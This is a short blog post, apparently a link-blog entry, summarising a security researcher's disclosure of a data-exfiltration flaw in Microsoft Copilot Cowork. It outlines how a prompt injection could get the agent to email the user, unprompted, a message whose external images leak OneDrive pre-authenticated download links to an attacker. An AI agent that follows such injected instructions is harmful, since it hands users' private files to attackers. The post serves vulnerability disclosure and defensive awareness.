Microsoft Copilot Cowork Exfiltrates Files (https://www.promptarmor.com/resources/microsoft-copilot-cowork-exfiltrates-files)

The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.

In this case Microsoft Copilot Cowork (yes, that’s a real product name (https://www.microsoft.com/en-us/microsoft-365/blog/2026/03/09/copilot-cowork-a-new-way-of-getting-work-done/)) was allowing agents to send emails to the user’s own inbox without approval… but those messages were then rendered in a way that could leak data to an attacker via rendered images:

Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent.

Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.

Via Hacker News (https://news.ycombinator.com/item?id=48272354)

Tags: microsoft (https://simonwillison.net/tags/microsoft), security (https://simonwillison.net/tags/security), ai (https://simonwillison.net/tags/ai), prompt-injection (https://simonwillison.net/tags/prompt-injection), generative-ai (https://simonwillison.net/tags/generative-ai), llms (https://simonwillison.net/tags/llms), exfiltration-attacks (https://simonwillison.net/tags/exfiltration-attacks), lethal-trifecta (https://simonwillison.net/tags/lethal-trifecta)